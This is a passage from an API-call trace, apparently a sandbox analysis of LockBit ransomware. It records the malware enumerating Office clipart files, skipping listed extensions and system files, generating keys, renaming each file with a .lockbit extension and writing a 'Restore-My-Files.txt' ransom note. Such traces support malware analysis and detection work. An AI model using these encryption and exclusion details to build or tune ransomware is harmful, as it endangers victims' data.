lpOverlapped=0x3d70450) returned 1 [0117.800] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.800] malloc (_Size=0xa6) returned 0x77d7a8 [0117.800] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.801] free (_Block=0x77d7a8) [0117.801] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00513_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.801] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.801] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.801] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6576c00, ftCreationTime.dwHighDateTime=0x1bd4aed, ftLastAccessTime.dwLowDateTime=0x61ca6dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd6576c00, ftLastWriteTime.dwHighDateTime=0x1bd4aed, nFileSizeHigh=0x0, nFileSizeLow=0x3960, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00524_.WMF", cAlternateFileName="")) returned 1 [0117.801] lstrcmpiW (lpString1=".", lpString2="HH00524_.WMF") returned -1 [0117.801] lstrcmpiW (lpString1="..", lpString2="HH00524_.WMF") returned -1 [0117.801] PathFindExtensionW (pszPath="HH00524_.WMF") returned=".WMF" [0117.801] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.802] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.802] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.802] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.802] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.802] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.802] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.802] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.802] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.802] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.802] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.802] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.802] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.802] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.802] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.802] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.802] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.802] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.803] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.803] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.803] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.803] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.803] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.803] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0117.803] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.803] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.803] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.803] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.803] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.803] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.803] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.803] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.803] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.803] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.803] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.803] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.803] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0117.803] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.803] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.803] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.803] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.804] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.804] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.804] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.804] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.804] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0117.804] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.804] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00524_.WMF") returned 1 [0117.804] lstrcmpiW (lpString1="ntldr", lpString2="HH00524_.WMF") returned 1 [0117.804] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00524_.WMF") returned 1 [0117.804] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00524_.WMF") returned -1 [0117.804] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00524_.WMF") returned -1 [0117.804] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00524_.WMF") returned 1 [0117.804] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00524_.WMF") returned 1 [0117.804] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.804] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned=".WMF" [0117.804] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.804] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.804] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.804] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.804] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.804] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.804] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.805] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.805] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.805] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.805] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.805] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.805] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.805] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.805] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.805] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.805] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.805] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.805] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0117.805] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.805] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.805] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.805] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.805] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.805] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.805] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.805] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.805] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.805] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF.lockbit") returned 72 [0117.806] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00524_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0117.806] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.806] malloc (_Size=0x40068) returned 0x1ff1e60 [0117.806] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=14688) returned 1 [0117.807] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.807] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.807] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0117.807] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.808] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0117.808] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0117.824] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.824] malloc (_Size=0xa6) returned 0x77d7a8 [0117.824] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.825] free (_Block=0x77d7a8) [0117.825] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.825] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.825] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.826] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3f51200, ftCreationTime.dwHighDateTime=0x1bd4aed, ftLastAccessTime.dwLowDateTime=0x5386f090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd3f51200, ftLastWriteTime.dwHighDateTime=0x1bd4aed, nFileSizeHigh=0x0, nFileSizeLow=0x34e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00526_.WMF", cAlternateFileName="")) returned 1 [0117.826] lstrcmpiW (lpString1=".", lpString2="HH00526_.WMF") returned -1 [0117.826] lstrcmpiW (lpString1="..", lpString2="HH00526_.WMF") returned -1 [0117.826] PathFindExtensionW (pszPath="HH00526_.WMF") returned=".WMF" [0117.826] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.826] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.826] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.826] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.826] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.826] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.826] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.826] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.826] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.826] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.826] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.826] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.826] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.826] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.826] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.826] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.826] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.826] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.827] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.827] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.827] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.827] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.827] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.827] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0117.827] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.827] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.827] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.827] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.827] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.827] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.827] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.827] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.827] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.827] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.827] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.827] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.827] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0117.827] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.827] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.827] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.828] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.828] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.828] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.828] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.828] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.828] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0117.828] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.828] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00526_.WMF") returned 1 [0117.828] lstrcmpiW (lpString1="ntldr", lpString2="HH00526_.WMF") returned 1 [0117.828] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00526_.WMF") returned 1 [0117.828] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00526_.WMF") returned -1 [0117.828] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00526_.WMF") returned -1 [0117.828] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00526_.WMF") returned 1 [0117.828] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00526_.WMF") returned 1 [0117.828] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.828] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF") returned=".WMF" [0117.828] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.828] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.828] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.828] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.828] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.828] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.829] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.829] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.829] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.829] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.829] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.829] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.829] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.829] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.829] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.829] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.829] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.829] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.829] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0117.829] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.829] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.829] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.829] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.829] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.829] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.829] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.829] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.829] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.829] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF.lockbit") returned 72 [0117.830] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00526_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0117.830] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.830] malloc (_Size=0x40068) returned 0x3d70450 [0117.830] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=13538) returned 1 [0117.830] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.831] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0117.831] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.831] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0117.832] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0117.836] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.836] malloc (_Size=0xa6) returned 0x77d7a8 [0117.836] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.837] free (_Block=0x77d7a8) [0117.837] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00526_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.837] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.837] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.837] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2c3e500, ftCreationTime.dwHighDateTime=0x1bd4aed, ftLastAccessTime.dwLowDateTime=0x5386f090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd2c3e500, ftLastWriteTime.dwHighDateTime=0x1bd4aed, nFileSizeHigh=0x0, nFileSizeLow=0x16a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00527_.WMF", cAlternateFileName="")) returned 1 [0117.837] lstrcmpiW (lpString1=".", lpString2="HH00527_.WMF") returned -1 [0117.837] lstrcmpiW (lpString1="..", lpString2="HH00527_.WMF") returned -1 [0117.837] PathFindExtensionW (pszPath="HH00527_.WMF") returned=".WMF" [0117.838] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.838] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.838] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.838] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.838] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.838] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.838] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.838] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.838] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.838] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.838] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.838] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.838] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.838] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.838] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.838] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.838] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.838] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.838] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.838] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.838] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.839] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.839] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.839] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0117.839] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.839] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.839] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.839] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.839] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.839] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.839] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.839] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.839] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.839] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.839] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.839] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.839] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0117.839] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.839] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.839] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.839] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.839] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.840] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.840] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.840] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.840] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0117.840] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.840] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00527_.WMF") returned 1 [0117.840] lstrcmpiW (lpString1="ntldr", lpString2="HH00527_.WMF") returned 1 [0117.840] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00527_.WMF") returned 1 [0117.840] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00527_.WMF") returned -1 [0117.840] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00527_.WMF") returned -1 [0117.840] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00527_.WMF") returned 1 [0117.840] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00527_.WMF") returned 1 [0117.840] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft 